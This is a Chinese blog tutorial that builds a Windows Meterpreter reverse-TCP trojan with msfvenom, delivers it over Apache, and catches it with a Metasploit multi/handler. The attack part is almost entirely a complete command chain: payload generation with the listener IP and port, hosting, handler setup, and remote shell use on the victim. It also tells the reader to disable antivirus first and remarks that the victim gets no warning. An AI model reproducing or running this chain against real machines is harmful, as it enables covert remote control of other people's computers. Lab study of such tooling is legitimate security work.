首页 > 其他分享 >利用msfvenom远程控制

利用msfvenom远程控制

时间:2024-10-25 16:59:12浏览次数:5  
标签:exe kali 192.168 远程 利用 75.133 msfvenom payload 输入

pAwD7Q0.png(NAT模式)在kali上先ifconfig得到kali的ip地址192.168.75.133
构建
`msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.75.133 lport=5000 -f exe -o /root/payload.exe

先转到/root
然后把这个文件放在apache的网站下

cd /root
`cp payload.exe /var/www/html

启动apache

systemctl start apache2
sysemctl status apache2

我这里用物理机win11登陆

在edge地址栏输入
kali的ip/payload.exe

会弹出一个框让你下载
(注意记得关杀毒软件)

接着在kali里输入
msfconsole
输入下面四条

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.75.133  # Kali 的 IP 地址
set lport 5000  # 监听的端口
exploit

会显示
pAwDLeU.png
然后再在物理机上运行刚刚下好的payload.exe

此时出现下图说明已经建立好链接
然后输入dir,就会出现物理机上的文件
pAwDOwF.png

输入shell和ipconfig

pAwDXo4.png

并且在kali上输入命令时,物理机不会有提示说正在被监听,正在被远程连接
因此这是很难注意到的危险

将生成的被控端放到网站上检测www.virustotal.com
pAwDvFJ.png

被标记成木马文件了

标签:exe,kali,192.168,远程,利用,75.133,msfvenom,payload,输入
From: https://www.cnblogs.com/liufengwuya/p/18502911

相关文章

  • 利用彩色相机给激光点云染色
    文章目录概述核心代码效果概述在激光SLAM(SimultaneousLocalizationandMapping)中,使用彩色相机为激光点云染色是一个常见的做法。这种技术结合了激光雷达的高精度距离测量和相机的丰富色彩信息,使得生成的点云不仅包含空间位置信息,还包含颜色信息,从而更直观和细......
  • kali一句话木马实验——远程控制(保姆级教程,新手小白也可以操作)
    1.打开apache;在终端中使用管理员权限输入serviceapache2start注:这个是为了打开80端口;打开之后可以使用nmapIP扫描查看80端口是否开放输入虚拟机IP地址,可以在物理机或者虚拟机浏览器打开apache;2.输入ifconfig查看虚拟机IP;3.在桌面找到home,在里面FileSystem目录下找......
  • 基于DPAPI+RDP技术实现本地打开远程程序,并映射到本地机器桌面上
    本教程使用工具所使用的环境说明:启动器开发工具:VS2022启动器所用客户端技术:.NET8+WPF启动器其他技术:DPAPI启动器发布的可执行程序,系统要求:Windows7以及以上,X64如果需要本程序,可以在网盘获取。网盘地址:通过网盘分享的文件:RemoteShadowApp.7z链接:https://pan.baidu.com......
  • Swift 中如何利用闭包实现异步回调?
    在Swift中,闭包是自包含的函数代码块,可以在代码中被传递和使用。它们非常适合用于实现异步回调,主要因为闭包能够捕获和存储其所在上下文中的任何常量和变量的引用。异步回调的实现步骤如下:1、 定义一个接受闭包作为参数的函数。这个闭包的类型取决于你期望的回调数据类型和逻辑。......
  • 利用010Editor修改so
    这里使用的so还是demo中的libBileton.so010Editor对so进行修改利用010Editor打开libBileton.so找到一部分字符串内容这里把这里面的字符串进行修改,我把大写的字母手动patch为了小写字母保存!把修改后的so放进app里先把它push到/sdcard/Download/目录下查一下apk中......
  • 使用本地浏览器打开远程服务器生成的网页——详细教程
    使用本地浏览器打开远程服务器生成的网页——详细教程在日常开发或运维中,我们常常需要访问部署在远程服务器上的网页应用,例如JupyterNotebook、Web服务等。通过SSH端口转发,我们可以在不暴露远程服务器端口的情况下,使用本地浏览器直接访问远程服务器生成的网页。本文将......
  • Docker和虚拟机在资源利用上有什么区别
    Docker和虚拟机在资源利用上的主要区别包括:1.启动速度不同;2.性能开销不同;3.硬件隔离水平不同;4.资源分配策略不同;5.存储管理不同;6.网络管理不同;7.系统占用空间不同。其中,Docker以其轻量级和高效的特点被广大开发者喜欢,而虚拟机则提供了更强大的隔离性和完整的操作系统环境。1.启......
  • 域内漏洞和利用
    实验目的与要求实验目的通过实验能够进行漏洞提权、复现、检测及防御。实验要求(1)认识近年来域内爆发的高危漏洞;(2)能够描述高危漏洞的背景、漏洞影响版本、漏洞原理;(3)能够利用漏洞提权,进行漏洞复现、检测及防御。实验原理与内容实验原理(1)简述提权及其分类提权(Pr......
  • 如何清空git远程库
    清空git远程库的步骤:1.备份重要数据;2.确定清空的目的;3.移除所有分支;4.删除标签(如果需要);5.清除Git对象;6.强制推送;7.警告和注意事项。在清空Git远程库之前,首先要确保重要的数据已经备份。1.备份重要数据在清空Git远程库之前,首先要确保重要的数据已经备份。这包括项目的最新代码......
  • 在Kotlin中如何利用协程进行异步编程
    使用Kotlin语言的协程,可进行高效的异步编程。关键步骤包含:1、引入相关库、2、创建协程作用域、3、使用构建器启动协程、4、管理协程生命周期以及并发,5、与其他线程互操作与异常处理。特别地,第2点,创建协程作用域涉及到定义一个`CoroutineScope`,这一环节是构建和管理Kotlin中协程生......